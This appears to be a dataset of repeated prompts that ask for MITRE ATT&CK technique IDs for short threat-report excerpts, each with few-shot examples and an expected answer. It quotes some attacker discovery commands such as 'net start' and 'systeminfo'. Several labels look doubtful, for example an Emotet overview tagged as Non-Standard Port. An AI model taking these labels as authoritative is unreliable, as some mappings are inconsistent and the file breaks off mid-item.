You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Then calls the fcL4qOb4 function to set the scheduled task and disguise as the one used by Google
- T1036.004: Masquerading - Masquerade Task or Service
- T1053.005: Scheduled Task/Job - Scheduled Task
- Text: Since the original publication of this approach, Proofpoint researchers have observed a number of actors -- “early adopters” -- abusing this file format by embedding it inside Microsoft Word and PDF documents. While the combination of the technique with the Microsoft Word container was described in the initial research, embedding inside PDFs has not been documented and likely originated with another source
- T1204.001: User Execution - Malicious Link
- T1204.002: User Execution - Malicious File
- Text: Frankenstein has used trojanized documents that retrieve remote templates from an adversary-controlled website.
- T1221: Template Injection
| The sample arrives as an app bundled in a Zip archive. It uses the icon for a Word document file as a disguise, attempting to pass itself off as a legitimate document file | - T1036.004: Masquerading - Masquerade Task or Service |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: LookBack can enumerate services on the victim machine.
- T1007: System Service Discovery
- Text: PoshC2 contains modules, such as "Get-LocAdm" for enumerating permission groups.
- T1069.001: Permission Groups Discovery - Local Groups
- Text: Pony has used the "NetUserEnum" function to enumerate local accounts.
- T1087.001: Account Discovery - Local Account
| actors used the following command following exploitation of a machine with malware to obtain information about services: net start >> %temp%\download | - T1007: System Service Discovery |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: When it first starts, BADNEWS crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.
- T1039: Data from Network Shared Drive
- Text: LAPSUS$ has accessed internet-facing identity providers such as Azure Active Directory and Okta to target specific organizations.
- T1199: Trusted Relationship
- Text: Zlh.exe is a legitimate, signed Norman Safeground AS application, which is used to sideload a malicious nflogger.dll DLL.The encrypted ZeroT payload is usually named NO.2.mui. The sideloaded DLL does not always use the same vulnerable executable, but it is always similar in functionality. Usually the DLL is not packed, but we have observed instances compressed by UPX. This malicious DLL is usually obfuscated with the same junk code: dummy API calls inserted in between real instructions (Fig. 7). The same obfuscation can be found in multiple functions in ZeroT itself
- T1027.001: Obfuscated Files or Information - Binary Padding
| CTU analysis indicates that BRONZE BUTLER primarily targets organizations located in Japan. The threat group has sought unauthorized access to networks of organizations associated with critical infrastructure, heavy industry, manufacturing, and international relations. Secureworks analysts have observed BRONZE BUTLER exfiltrating the following categories of data | - T1039: Data from Network Shared Drive
- T1005: Data from Local System |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: BADNEWS encodes C2 traffic with base64.
- T1132.001: Data Encoding - Standard Encoding
- Text: PlugX can use RC4 encryption in C2 communications.
- T1573.001: Encrypted Channel - Symmetric Cryptography
- Text: HARDRAIN uses FakeTLS to communicate with its C2 server.
- T1001.003: Data Obfuscation - Protocol Impersonation
| The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie | - T1573: Encrypted Channel |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Octopus has used wmic.exe for local discovery information.
- T1047: Windows Management Instrumentation
- Text: OilRig has run "hostname" and "systeminfo" on a victim.
- T1082: System Information Discovery
- Text: XCSSET uses "ps aux" with the "grep" command to enumerate common browsers and system processes potentially impacting XCSSET's exfiltration capabilities.
- T1518: Software Discovery
| Once installed, JSSLoader provides the threat group with a backdoor to the victim’s computer and the organization | - T1204.002: User Execution - Malicious File
- T1047: Windows Management Instrumentation |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: The shellcode is not encrypted but is obfuscated
- T1027: Obfuscated Files or Information
- Text: KEYMARBLE uses a customized XOR algorithm to encrypt C2 communications.
- T1573.001: Encrypted Channel - Symmetric Cryptography
- Text: InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration.
- T1560.003: Archive Collected Data - Archive via Custom Method
| Variants of Emissary encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the "srand" and "rand" functions. | - T1027: Obfuscated Files or Information |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Kimsuky has obtained specific Registry keys and values on a compromised host.
- T1012: Query Registry
- Text: P.A.S. Webshell can list PHP server configuration details.
- T1518: Software Discovery
- Text: Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers
- T1057: Process Discovery
- T1518.001: Software Discovery - Security Software Discovery
| Stealth Falcon malware attempts to determine the installed version of .NET by querying the Registry. | - T1012: Query Registry |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: OopsIE compresses collected files with GZipStream before sending them to its C2 server.
- T1560.001: Archive Collected Data - Archive via Utility
- Text: Chinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.
- T1560: Archive Collected Data
- Text: Mis-Type has temporarily stored collected information to the files `“%AppData%\{Unique Identifier}\HOSTRURKLSR”` and `“%AppData%\{Unique Identifier}\NEWERSSEMP”`.
- T1074.001: Data Staged - Local Data Staging
| To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip | - T1560: Archive Collected Data |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Agent Tesla can gather credentials from a number of browsers.
- T1555.003: Credentials from Password Stores - Credentials from Web Browsers
- Text: Several of the tools are freely-available Windows utilities, such as Amplia Security’s Windows Credential Editor. We also found a nearly complete set of the Microsoft SysInternals PsTools package, a copy of NLBrute (which attempts to brute-force passwords), installers for the commercial TeamViewer and AnyDesk remote support tools, and a number of utilities created by endpoint security vendors that are designed to remove their (and other companies’) endpoint security and antivirus tools from a computer.
- T1110: Brute Force
- Text: Magic Hound gathered credentials from two victims that they then attempted to validate across 75 different websites.
- T1589.001: Gather Victim Identity Information - Credentials
| Carbanak also performs brute force tactics or takes advantage of credentials that are saved in web browsers. | - T1110: Brute Force |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: RogueRobin uses regsvr32.exe to run a .sct file for execution.
- T1218.010: System Binary Proxy Execution - Regsvr32
- Text: APT32 ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).
- T1574.002: Hijack Execution Flow - DLL Side-Loading
- Text: BLINDINGCAN has used Rundll32 to load a malicious DLL.
- T1218.011: System Binary Proxy Execution - Rundll32
| Egregor has used regsvr32.exe to execute malicious DLLs. | - T1218.010: System Binary Proxy Execution - Regsvr32 |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: GravityRAT executes commands remotely on the infected host.
- T1059.003: Command and Scripting Interpreter - Windows Command Shell
- Text: (Source: Dell SecureWorks) Table 4 lists the OwaAuth web shell commands available to the adversary
- T1059: Command and Scripting Interpreter
- T1505.003: Server Software Component - Web Shell
- Text: XCSSET uses a shell script to execute Mach-o files and "osacompile" commands such as, "osacompile -x -o xcode.app main.applescript".
- T1059.004: Command and Scripting Interpreter - Unix Shell
| 4H RAT has the capability to create a remote shell. | - T1059.003: Command and Scripting Interpreter - Windows Command Shell |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system
- T1566.001: Phishing - Spearphishing Attachment
- T1566.001: Phishing - Spearphishing Attachment
- Text: TrickBot has been delivered via malicious links in phishing e-mails.
- T1566.002: Phishing - Spearphishing Link
- Text: Emotet can brute force a local admin password, then use it to facilitate lateral movement.
- T1078.003: Valid Accounts - Local Accounts
| Emotet is one of the most widely distributed and actively developed malware families on the crimeware landscape today. Emotet began purely as a banking trojan, but over the years, has continued to evolve and more recently, has been associated with some larger-scale targeted Ryuk ransomware infections. Emotet is commonly delivered via both macro-laden office documents, as well as URL-based spam messages that lead to an eventual infection. It's not uncommon to see Emotet reuse of some of the command and control (C2) servers over more extended periods. The goal of Emotet, as is the case with crimeware-based threats, is monetary. Attackers use Emotet to deliver modular payloads it can use to monetize infections | - T1571: Non-Standard Port |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Kimsuky has set auto-forward rules on victim's e-mail accounts.
- T1114.003: Email Collection - Email Forwarding Rule
- Text: Sandworm Team has created email accounts that mimic legitimate organizations for its spearphishing operations.
- T1585.002: Establish Accounts - Email Accounts
- Text: Functionally, Gauss is designed to collect as much information about infected systems as possible, as well as to steal credentials for various banking systems and social network, email and IM accounts. The Gauss code includes commands to intercept data required to work with several Lebanese banks – for instance, Bank of Beirut, Byblos Bank, and Fransabank.
- T1114: Email Collection
- T1082: System Information Discovery
| Silent Librarian has set up auto forwarding rules on compromised e-mail accounts. | - T1114.003: Email Collection - Email Forwarding Rule |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: FIN7 used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.
- T1102.002: Web Service - Bidirectional Communication
- Text: Ember Bear has used Discord's content delivery network (CDN) to deliver malware and malicious scripts to a compromised host.
- T1102: Web Service
- Text: Get2 has the ability to use HTTP to send information collected from an infected host to C2.
- T1071.001: Application Layer Protocol - Web Protocols
| BoxCaon has used DropBox for C2 communications. | - T1102.002: Web Service - Bidirectional Communication |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: ComRAT samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location "HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32".
- T1546.015: Event Triggered Execution - Component Object Model Hijacking
- Text: MCMD can use Registry Run Keys for persistence.
- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder
- Text: TinyTurla can set its configuration parameters in the Registry.
- T1112: Modify Registry
| ComRAT samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location "HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32". | - T1546.015: Event Triggered Execution - Component Object Model Hijacking |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.
- T1565.001: Data Manipulation - Stored Data Manipulation
- Text: Metamorfo has disguised an MSI file as the Adobe Acrobat Reader Installer and has masqueraded payloads as OneDrive, WhatsApp, or Spotify, for example.
- T1036.005: Masquerading - Match Legitimate Name or Location
- Text: System info: Computer name System info using: cmd /c systeminfo >%temp%\temp.ini List of currently running process using: cmd /c tasklist >%temp%\temp.ini Exfiltration The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern: From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt
- T1082: System Information Discovery
- T1074: Data Staged
- T1057: Process Discovery
- T1486: Data Encrypted for Impact
| SUNSPOT created a copy of the SolarWinds Orion software source file with a ".bk" extension to backup the original content, wrote SUNBURST using the same filename but with a ".tmp" extension, and then moved SUNBURST using "MoveFileEx" to the original filename with a ".cs" extension so it could be compiled within Orion software. | - T1565.001: Data Manipulation - Stored Data Manipulation |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: uses the keychaindump project to read securityd memory.
- T1555.002: Credentials from Password Stores - Securityd Memory
- Text: Empire can use built-in modules to abuse trusted utilities like MSBuild.exe.
- T1127: Trusted Developer Utilities Proxy Execution
- T1127.001: Trusted Developer Utilities Proxy Execution - MSBuild
- Text: SDBbot has the ability to inject a downloaded DLL into a newly created rundll32.exe process.
- T1055.001: Process Injection - Dynamic-link Library Injection
| uses the keychaindump project to read securityd memory. | - T1555.002: Credentials from Password Stores - Securityd Memory |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: A JHUHUGIT variant gathers network interface card information.
- T1016: System Network Configuration Discovery
- Text: No matching sample found for T1557.002
- Text: can gather information about the host.
- T1082: System Information Discovery
| APT19 used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine. | - T1016: System Network Configuration Discovery |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Ke3chang has used the right-to-left override character in spearphishing attachment names to trick targets into executing .scr and .exe files.
- T1036.002: Masquerading - Right-to-Left Override
- Text: Wizard Spider has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either Emotet, Bokbot, TrickBot, or Bazar.
- T1566.001: Phishing - Spearphishing Attachment
- Text: Hardcore Nationalist group SideWinder is a threat group active since 2012 according to Kaspersky. This group mainly targets Pakistanis and Chinese military & government entities’ windows machines. They also target mobile phone devices. This is the second time this group is using COVID-19 theme to lure victims, thereby capitalizing on the fear of global pandemic. Sidewinder aka HN2 is believed to be an Indian state sponsored group. A detailed analysis of SideWinder attacks on Pakistani military officials was also published in April
- T1204.002: User Execution - Malicious File
- T1204.001: User Execution - Malicious Link
| In March, we came across an email with a malware attachment that used the Gamaredon group’s tactics. | - T1204: User Execution |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: AADInternals can gather information about a tenant’s domains using public Microsoft APIs.
- T1590.001: Gather Victim Network Information - Domain Properties
- Text: AADInternals can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. AADInternals can also modify DesktopSSO information.
- T1484.002: Domain or Tenant Policy Modification - Trust Modification
- Text: APT32 has collected e-mail addresses for activists and bloggers in order to target them with spyware.
- T1589.002: Gather Victim Identity Information - Email Addresses
| AADInternals can gather information about a tenant’s domains using public Microsoft APIs. | - T1590.001: Gather Victim Network Information - Domain Properties |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself
- T1598.003: Phishing for Information - Spearphishing Link
- Text: Charming Kitten has taken full advantage of this timing to execute its new campaign to maximum effect. Details Of The Attacks . Our examination of the acquired samples shows hackers generally use two main methods of “Sending Fake SMS” and “Sending Fake Emails” to execute their attacks. They send confirmation messages stating ‘Google Account Recovery’ to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity. Method #2: Fake Email . Another method used in this phishing campaign is sending fake emails with deceptive titles like “Merry Christmas, and sending note/book/photo and others”, which are usually sent by previously hacked emails. Figure 2 shows one of these phishing emails where the attackers cordially invite the target to open the link in the email’s body. For example, Figure 3 shows another fake email that was sent to the same victim a day after the initial email (Figure 2). Figure 3. A sample of fake email after sending the initial email to the target . Redirect Chain . Utilizing and weaponizing legal and credible services to hide destructive intent is one of the techniques used by hackers in some phishing campaigns. Redirection links initially help bypass the security layers in email services, and then provide the attackers more control to redirect the target to the final URL. As usual, we firmly suggest not to click on unknown links, to carefully review any URLs before entering credential information, and not to download and run unknown files on mobile, personal or work computers. It is important to note that the main cases mentioned in this report relate to the latest Charming Kitten’s phishing campaign and that this campaign has significantly intensified in recent days
- T1566.002: Phishing - Spearphishing Link
- Text: Windshift has used links embedded in e-mails to lure victims into executing malicious code.
- T1204.001: User Execution - Malicious Link
| APT32 has used malicious links to direct users to web pages designed to harvest credentials. | - T1598.003: Phishing for Information - Spearphishing Link |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Elderwood has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector.
- T1189: Drive-by Compromise
- Text: HEXANE has used cloud services, including OneDrive, for C2.
- T1102.002: Web Service - Bidirectional Communication
- Text: Threat Group-3390 has hosted malicious payloads on Dropbox.
- T1608.001: Stage Capabilities - Upload Malware
| The cluster targeting Brazil used hacked websites and Google Ads to drive users to download the malicious installer. The campaign targeting other countries used spear-phishing as the delivery method | - T1189: Drive-by Compromise |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: The attacker made use of Cobalt Strike’s “psexec” lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell
- T1546.013: Event Triggered Execution - PowerShell Profile
- T1059.001: Command and Scripting Interpreter - PowerShell
- Text: Cardinal RAT decodes many of its artifacts and is decrypted (AES-128) after being downloaded.
- T1140: Deobfuscate/Decode Files or Information
- Text: While Diavol is not packed nor has any anti-disassembly tricks, it does use an interesting anti-analysis technique to obfuscate its code. Its main routines are kept in bitmap images, which are stored in the PE resource section. Before calling each routine, it copies the bytes from the bitmap to a global buffer that has execute permissions
- T1106: Native API
- T1027.003: Obfuscated Files or Information - Steganography
| AutoIt backdoor downloads a PowerShell script that decodes to a typical shellcode loader. | - T1059.001: Command and Scripting Interpreter - PowerShell |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: The sample arrives as an app bundled in a Zip archive. It uses the icon for a Word document file as a disguise, attempting to pass itself off as a legitimate document file
- T1036.004: Masquerading - Masquerade Task or Service
- Text: AuditCred is installed as a new service on the system.
- T1543.003: Create or Modify System Process - Windows Service
- Text: The actors named one instance of their web shell 'outlookconfiguration.aspx' likely for the purpose of appearing to be a legitimate webpage on a targeted OWA server.
- T1036.005: Masquerading - Match Legitimate Name or Location
| In one instance, menuPass added PlugX as a service with a display name of "Corel Writing Tools Utility." | - T1036.004: Masquerading - Masquerade Task or Service |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Dacls can collect data on running and parent processes.
- T1057: Process Discovery
- Text: REvil can enumerate active services.
- T1007: System Service Discovery
- Text: OilRig has run "net user", "net user /domain", "net group “domain admins” /domain", and "net group “Exchange Trusted Subsystem” /domain" to get account listings on a victim.
- T1087.001: Account Discovery - Local Account
- T1087.002: Account Discovery - Domain Account
| Elise enumerates processes via the "tasklist" command. | - T1057: Process Discovery |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: The 'ssonsvr.exe' file is a legitimate Citrix executable that will be used to sideload the malicious ‘pnipcn.dll’ file
- T1574.002: Hijack Execution Flow - DLL Side-Loading
- Text: We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file. The compromised files are not from Zoom’s official download center, and are assumed to come from fraudulent websites. We have been working with Zoom to ensure that they are able to communicate this to their users appropriately.
- T1588.001: Obtain Capabilities - Malware
- T1554: Compromise Host Software Binary
- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain
- T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness
- Text: StrongPity has been bundled with legitimate software installation files for disguise.
- T1036.005: Masquerading - Match Legitimate Name or Location
| During the installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware. | - T1574.002: Hijack Execution Flow - DLL Side-Loading |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: IcedID has used obfuscated VBA string expressions.
- T1059.005: Command and Scripting Interpreter - Visual Basic
- Text: During Frankenstein, the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.
- T1221: Template Injection
- Text: PoetRAT has used spearphishing attachments to infect victims.
- T1204.002: User Execution - Malicious File
| The Word document has a malicious macro in it and, when opened by the victim, it will drop and execute a file in a specific folder | - T1204.002: User Execution - Malicious File |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Winnti Linux variant’s core functionality is within ‘libxselinux’. Upon execution, an embedded configuration is decoded from the data section using a simple XOR cipher. An example Python function to decode this configuration is shown below
- T1027: Obfuscated Files or Information
- T1140: Deobfuscate/Decode Files or Information
